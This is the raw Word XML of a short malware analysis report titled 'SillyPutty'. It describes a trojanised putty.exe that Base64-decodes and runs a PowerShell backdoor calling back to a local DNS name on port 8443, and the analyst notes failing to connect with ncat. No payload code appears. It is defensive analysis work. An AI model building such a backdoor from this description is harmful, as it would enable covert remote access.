    <w:p w14:paraId="54CE3EDF" w14:textId="6F405D19" w:rsidR="00201C0F" w:rsidRDefault="00201C0F" w:rsidP="00201C0F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C20FCA2" w14:textId="4CEE2DE4" w:rsidR="00201C0F" w:rsidRPr="00201C0F" w:rsidRDefault="00201C0F" w:rsidP="00201C0F">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sillyputty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> malware is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> backdoor</w:t>
      </w:r>
      <w:r w:rsidR="00E111C3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FF35C9">
        <w:t xml:space="preserve"> When the malware is started it connects to a DNS address of Bonus2.corporation</w:t>
      </w:r>
      <w:r w:rsidR="00256176">
        <w:t>bonusapplication.local</w:t>
      </w:r>
      <w:r w:rsidR="008A5BCA">
        <w:t xml:space="preserve">. The malware then starts to connect to </w:t>
      </w:r>
      <w:r w:rsidR="00E0505A">
        <w:t>a call back port of 8443</w:t>
      </w:r>
      <w:r w:rsidR="00EE0235">
        <w:t xml:space="preserve">, on https. </w:t>
      </w:r>
      <w:r w:rsidR="000146DF">
        <w:t xml:space="preserve">Without a certificate </w:t>
      </w:r>
      <w:r w:rsidR="006F5FB1">
        <w:t xml:space="preserve">it wasn’t possible to </w:t>
      </w:r>
      <w:r w:rsidR="000866E4">
        <w:t xml:space="preserve">cerate a working </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000866E4">
        <w:t>ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000866E4">
        <w:t xml:space="preserve"> connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1351E353" w14:textId="5A0760E9" w:rsidR="00F54E18" w:rsidRDefault="00F54E18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</w:p>
    <w:p w14:paraId="5498C2B5" w14:textId="77777777" w:rsidR="0005795C" w:rsidRPr="0005795C" w:rsidRDefault="0005795C" w:rsidP="0005795C"/>
    <w:p w14:paraId="55C85B62" w14:textId="0266B3A5" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18"/>
    <w:sectPr w:rsidR="00F54E18" w:rsidSect="0063562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A5A9" w14:textId="77777777" w:rsidR="00200E09" w:rsidRDefault="00200E09" w:rsidP="00635627">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4501F188" w14:textId="77777777" w:rsidR="00200E09" w:rsidRDefault="00200E09" w:rsidP="0063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BEB9" w14:textId="7633B055" w:rsidR="00635627" w:rsidRDefault="00635627" w:rsidP="00635627">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="5CAC3B63" w14:textId="5E1CA1F7" w:rsidR="00635627" w:rsidRDefault="008C55E4">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:t>SillyPutty</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
  </w:p>
  <w:p w14:paraId="3915FE8B" w14:textId="613BAA9D" w:rsidR="00635627" w:rsidRDefault="008C55E4">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:t>Aug</w:t>
    </w:r>
    <w:r w:rsidR="00635627">
      <w:t xml:space="preserve"> 202</w:t>
    </w:r>
    <w:r>
      <w:t>2</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="7311B6FA" w14:textId="7F624CAE" w:rsidR="00635627" w:rsidRDefault="00635627">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:t>v1.0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4603" w14:textId="77777777" w:rsidR="00200E09" w:rsidRDefault="00200E09" w:rsidP="00635627">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="74EBC05D" w14:textId="77777777" w:rsidR="00200E09" w:rsidRDefault="00200E09" w:rsidP="0063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B734" w14:textId="375FCBAA" w:rsidR="00635627" w:rsidRDefault="00480604" w:rsidP="00635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51DEE" wp14:editId="22AA0F54">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:align>center</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>784860</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="705612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561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85AD1A" id="Straight Connector 2" o:spid="_x0000_s1026" style="position:absolute;flip:x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1.8pt" to="555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" strokecolor="#4472c4 [3204]" strokeweight=".5pt">
              <v:stroke joinstyle="miter"/>
              <w10:wrap anchorx="margin"/>
            </v:line>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidR="00635627">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EF4EE52" wp14:editId="6AE4FCA5">
          <wp:extent cx="822586" cy="732155"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"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948" cy="742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5C42C" w14:textId="1CC11C1A" w:rsidR="00480604" w:rsidRDefault="00480604" w:rsidP="006356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4A9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94DAE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9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7"/>
    <w:rsid w:val="0000714D"/>
    <w:rsid w:val="000146DF"/>
    <w:rsid w:val="00033B0B"/>
    <w:rsid w:val="0005795C"/>
    <w:rsid w:val="000866E4"/>
    <w:rsid w:val="00124742"/>
    <w:rsid w:val="00131E8B"/>
    <w:rsid w:val="00136992"/>
    <w:rsid w:val="001B1896"/>
    <w:rsid w:val="001D4020"/>
    <w:rsid w:val="00200E09"/>
    <w:rsid w:val="00201C0F"/>
    <w:rsid w:val="00201CF7"/>
    <w:rsid w:val="00256176"/>
    <w:rsid w:val="00324290"/>
    <w:rsid w:val="00340340"/>
    <w:rsid w:val="00393D4A"/>
    <w:rsid w:val="003D280B"/>
    <w:rsid w:val="003E1DA1"/>
    <w:rsid w:val="00404257"/>
    <w:rsid w:val="00480604"/>
    <w:rsid w:val="0048207E"/>
    <w:rsid w:val="00491543"/>
    <w:rsid w:val="004E000A"/>
    <w:rsid w:val="004F1E87"/>
    <w:rsid w:val="00516D33"/>
    <w:rsid w:val="00551809"/>
    <w:rsid w:val="005D5761"/>
    <w:rsid w:val="005F08C6"/>
    <w:rsid w:val="00635627"/>
    <w:rsid w:val="00641B76"/>
    <w:rsid w:val="00683CD5"/>
    <w:rsid w:val="006D3B17"/>
    <w:rsid w:val="006D6D92"/>
    <w:rsid w:val="006E01D3"/>
    <w:rsid w:val="006F5FB1"/>
    <w:rsid w:val="00700C81"/>
    <w:rsid w:val="00811599"/>
    <w:rsid w:val="008403BF"/>
    <w:rsid w:val="00866A2E"/>
    <w:rsid w:val="008A5BCA"/>
    <w:rsid w:val="008C55E4"/>
    <w:rsid w:val="00915330"/>
    <w:rsid w:val="00942A2A"/>
    <w:rsid w:val="009944D5"/>
    <w:rsid w:val="009A6BBF"/>
    <w:rsid w:val="009B2946"/>
    <w:rsid w:val="009B4982"/>
    <w:rsid w:val="009D598D"/>
    <w:rsid w:val="009E54DC"/>
    <w:rsid w:val="00A05E23"/>
    <w:rsid w:val="00A819E4"/>
    <w:rsid w:val="00AD3748"/>
    <w:rsid w:val="00B81CF3"/>
    <w:rsid w:val="00BD75A3"/>
    <w:rsid w:val="00C424D4"/>
    <w:rsid w:val="00CB44D1"/>
    <w:rsid w:val="00D77182"/>
    <w:rsid w:val="00E0064F"/>
    <w:rsid w:val="00E0505A"/>
    <w:rsid w:val="00E111C3"/>
    <w:rsid w:val="00E20896"/>
    <w:rsid w:val="00E32A25"/>
    <w:rsid w:val="00E8270E"/>
    <w:rsid w:val="00EE0235"/>
    <w:rsid w:val="00F0342B"/>
    <w:rsid w:val="00F54E18"/>
    <w:rsid w:val="00F73BF4"/>
    <w:rsid w:val="00FB0783"/>
    <w:rsid w:val="00FD61A8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A1E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27"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book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896"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Montserrat Medium" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium" w:cstheme="majorBidi"/>
      <w:b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E18"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr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96"/>
    <w:rPr>
      <w:rFonts w:ascii="Montserrat Medium" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium" w:cstheme="majorBid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3562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5627"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10070"/>
      </w:tabs>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="auto"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5627"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="auto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5627"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10070"/>
      </w:tabs>
      <w:spacing w:after="60"/>
      <w:ind w:left="403"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="auto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E18"/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E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1E87"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E3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D9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424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D2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0064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CDC70A-D13A-4143-AE54-324F7A0EE539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675F9D1-DCCC-470A-A306-D50BD14A969B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putty.exe</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EEA8068E-626F-4FD0-8857-F565967EC278}" type="parTrans" cxnId="{19DF72AB-18C4-40F1-B102-2108C62F4922}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4822C0D4-1F8A-4DED-88CC-EEAD689BC6FC}" type="sibTrans" cxnId="{19DF72AB-18C4-40F1-B102-2108C62F4922}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7DCAFFB-7B0B-4F29-9F3B-975366AB3003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Base64 decode and run</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9BE864AF-5BF8-46AC-B5BF-DDB56C5EA2E5}" type="parTrans" cxnId="{D3245460-EC29-431F-8E1E-6E49A8C8DBC8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7470480E-DE37-4842-BB1D-3C010D3DC721}" type="sibTrans" cxnId="{D3245460-EC29-431F-8E1E-6E49A8C8DBC8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A03CA4E-16EF-44E5-950B-85A7B4B68AD2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Runs a powershell backdoor </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FC65411-7BFC-496F-BABD-A49FB290C44B}" type="parTrans" cxnId="{0ABCA4E2-9688-4A88-B2F7-7D1F141ACF29}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7A3C98F-EFA1-4150-8C61-071028FDB6A5}" type="sibTrans" cxnId="{0ABCA4E2-9688-4A88-B2F7-7D1F141ACF29}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4720D96E-6E0C-4A07-BAE1-10A99FFDEAA0}" type="pres">
      <dgm:prSet presAssocID="{3BCDC70A-D13A-4143-AE54-324F7A0EE53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2A86321-27B9-40CC-8E67-EBE46F64F4AA}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="root" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AE7A2C11-5012-4666-8E26-7D1F496AAD46}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="rootComposite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C70499B9-9E13-4666-9509-800D713B9607}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="rootText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F1123AB9-6632-421F-9FA1-D52FCB934995}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="rootConnector" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3B261433-48B5-45E1-8302-2E3844F6256B}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="childShape" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{660A2F0E-33F3-4940-9D0D-EF5C99F91DD5}" type="pres">
      <dgm:prSet presAssocID="{9BE864AF-5BF8-46AC-B5BF-DDB56C5EA2E5}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{05B560B7-D20C-4F28-970C-4812B9C591F3}" type="pres">
      <dgm:prSet presAssocID="{D7DCAFFB-7B0B-4F29-9F3B-975366AB3003}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A2CC9F21-EE73-4FD0-8A58-7D3DBBA5D03A}" type="pres">
      <dgm:prSet presAssocID="{0FC65411-7BFC-496F-BABD-A49FB290C44B}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB74F4A0-6667-4351-9A85-AA0C7736449F}" type="pres">
      <dgm:prSet presAssocID="{0A03CA4E-16EF-44E5-950B-85A7B4B68AD2}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7252AC3D-7BA7-4D5C-9B48-603619823067}" type="presOf" srcId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" destId="{F1123AB9-6632-421F-9FA1-D52FCB934995}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{6734575C-FF2F-4EDA-8C70-D616925C74F3}" type="presOf" srcId="{0FC65411-7BFC-496F-BABD-A49FB290C44B}" destId="{A2CC9F21-EE73-4FD0-8A58-7D3DBBA5D03A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{D3245460-EC29-431F-8E1E-6E49A8C8DBC8}" srcId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" destId="{D7DCAFFB-7B0B-4F29-9F3B-975366AB3003}" srcOrd="0" destOrd="0" parTransId="{9BE864AF-5BF8-46AC-B5BF-DDB56C5EA2E5}" sibTransId="{7470480E-DE37-4842-BB1D-3C010D3DC721}"/>
    <dgm:cxn modelId="{0FBAE84D-2204-40C4-833B-99FD5A06F912}" type="presOf" srcId="{D7DCAFFB-7B0B-4F29-9F3B-975366AB3003}" destId="{05B560B7-D20C-4F28-970C-4812B9C591F3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{19DF72AB-18C4-40F1-B102-2108C62F4922}" srcId="{3BCDC70A-D13A-4143-AE54-324F7A0EE539}" destId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" srcOrd="0" destOrd="0" parTransId="{EEA8068E-626F-4FD0-8857-F565967EC278}" sibTransId="{4822C0D4-1F8A-4DED-88CC-EEAD689BC6FC}"/>
    <dgm:cxn modelId="{8047C2BF-74FC-45C9-8BED-6CC3D6294FBF}" type="presOf" srcId="{3BCDC70A-D13A-4143-AE54-324F7A0EE539}" destId="{4720D96E-6E0C-4A07-BAE1-10A99FFDEAA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{078DBDCA-7778-433B-9154-B17AA9A73C65}" type="presOf" srcId="{0A03CA4E-16EF-44E5-950B-85A7B4B68AD2}" destId="{BB74F4A0-6667-4351-9A85-AA0C7736449F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{D1889AE2-DB58-437E-9B66-D435FB666EB3}" type="presOf" srcId="{9BE864AF-5BF8-46AC-B5BF-DDB56C5EA2E5}" destId="{660A2F0E-33F3-4940-9D0D-EF5C99F91DD5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{0ABCA4E2-9688-4A88-B2F7-7D1F141ACF29}" srcId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" destId="{0A03CA4E-16EF-44E5-950B-85A7B4B68AD2}" srcOrd="1" destOrd="0" parTransId="{0FC65411-7BFC-496F-BABD-A49FB290C44B}" sibTransId="{E7A3C98F-EFA1-4150-8C61-071028FDB6A5}"/>
    <dgm:cxn modelId="{005ACAEC-2321-4E74-8CF0-8F1AFCA87FBB}" type="presOf" srcId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" destId="{C70499B9-9E13-4666-9509-800D713B9607}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{589BE807-98ED-47C7-9094-F65024B050D6}" type="presParOf" srcId="{4720D96E-6E0C-4A07-BAE1-10A99FFDEAA0}" destId="{52A86321-27B9-40CC-8E67-EBE46F64F4AA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{83BFA9E1-4FA1-4082-AFBF-1B1B8A3AA80A}" type="presParOf" srcId="{52A86321-27B9-40CC-8E67-EBE46F64F4AA}" destId="{AE7A2C11-5012-4666-8E26-7D1F496AAD46}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{37ABD5F9-3970-46C0-985E-AE9C9ED310D8}" type="presParOf" srcId="{AE7A2C11-5012-4666-8E26-7D1F496AAD46}" destId="{C70499B9-9E13-4666-9509-800D713B9607}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{DD6D6D96-23D3-4685-A7C0-F844A832F7F9}" type="presParOf" srcId="{AE7A2C11-5012-4666-8E26-7D1F496AAD46}" destId="{F1123AB9-6632-421F-9FA1-D52FCB934995}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{7AF42180-C119-488D-B438-CCE084D9ED00}" type="presParOf" srcId="{52A86321-27B9-40CC-8E67-EBE46F64F4AA}" destId="{3B261433-48B5-45E1-8302-2E3844F6256B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{74E51A8A-4C04-46DD-880A-31D5EE384FB5}" type="presParOf" srcId="{3B261433-48B5-45E1-8302-2E3844F6256B}" destId="{660A2F0E-33F3-4940-9D0D-EF5C99F91DD5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{2F095FD3-3639-4DAB-A9F0-39C2AF6765D7}" type="presParOf" srcId="{3B261433-48B5-45E1-8302-2E3844F6256B}" destId="{05B560B7-D20C-4F28-970C-4812B9C591F3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{E0B7FF04-F459-4B80-9874-D8684A1AADF9}" type="presParOf" srcId="{3B261433-48B5-45E1-8302-2E3844F6256B}" destId="{A2CC9F21-EE73-4FD0-8A58-7D3DBBA5D03A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{2B9207E1-539D-40F7-AD18-72E04F105C3F}" type="presParOf" srcId="{3B261433-48B5-45E1-8302-2E3844F6256B}" destId="{BB74F4A0-6667-4351-9A85-AA0C7736449F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0499B9-9E13-4666-9509-800D713B9607}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1597648" y="1567"/>
          <a:ext cx="3309642" cy="1654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7155" tIns="64770" rIns="97155" bIns="64770" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr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100" kern="1200">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>putty.exe</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1646116" y="50035"/>
        <a:ext cx="3212706" cy="1557885"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{660A2F0E-33F3-4940-9D0D-EF5C99F91DD5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1928613" y="1656389"/>
          <a:ext cx="330964" cy="1241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1115"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="330964" y="1241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560B7-D20C-4F28-970C-4812B9C591F3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2259577" y="2070094"/>
          <a:ext cx="2647713" cy="16548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43180" rIns="6477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>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>Base64 decode and run</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2308045" y="2118562"/>
        <a:ext cx="2550777" cy="1557885"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A2CC9F21-EE73-4FD0-8A58-7D3DBBA5D03A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1928613" y="1656389"/>
          <a:ext cx="330964" cy="3309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9642"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="330964" y="3309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4F4A0-6667-4351-9A85-AA0C7736449F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2259577" y="4138620"/>
          <a:ext cx="2647713" cy="16548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43180" rIns="6477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>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>Runs a powershell backdoor </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2308045" y="4187088"/>
        <a:ext cx="2550777" cy="15578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2022-08-21T15:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-21T15:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>